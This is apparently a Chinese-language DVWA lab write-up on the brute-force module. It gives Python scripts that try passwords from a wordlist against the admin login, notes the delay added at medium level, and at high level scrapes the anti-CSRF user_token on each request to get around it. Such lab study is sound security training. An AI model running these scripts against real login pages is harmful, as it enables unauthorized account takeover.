low
遍歷字典(成功的前提是字典裏有這個密碼)
import requests
import re
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
headers = {
'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low'
}
h = open('pwd.txt')
line = h.readline()
while line:
password = line.strip()
new_url = url + '?username=admin&password=' + password + '&Login=Login'
res = requests.get(new_url, headers=headers)
if 'Username and/or password incorrect.' in res.content:
print('Test %s: No' % password)
else:
print('Test %s: Yes' % password)
break
line = h.readline()
if __name__ == '__main__':
main()
結果
Test 123456: No
Test admin: No
Test password: Yes
[Finished in 0.3s]
medium
查看源碼發現
sleep( 2 );
測試不成功時會延時2s,方法和low一樣,只是慢一些,需要更新cookie中的安全等級security。
headers = {
'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium'
}
high
查看源碼發現
<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
多一個字段,測試後可發現user_token字段的值是動態的,思路即是在代碼層面動態獲該字段的值,再發測試密碼的請求。
import requests
import re
def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
headers = {
'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high'
}
h = open('pwd.txt')
line = h.readline()
while line:
password = line.strip()
res = requests.get(url, headers=headers)
m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
if m:
user_token = m.group(1)
new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login'
res = requests.get(new_url, headers=headers)
if 'Username and/or password incorrect.' in res.content:
print('Test %s: No' % password)
else:
print('Test %s: Yes' % password)
break
line = h.readline()
if __name__ == '__main__':
main()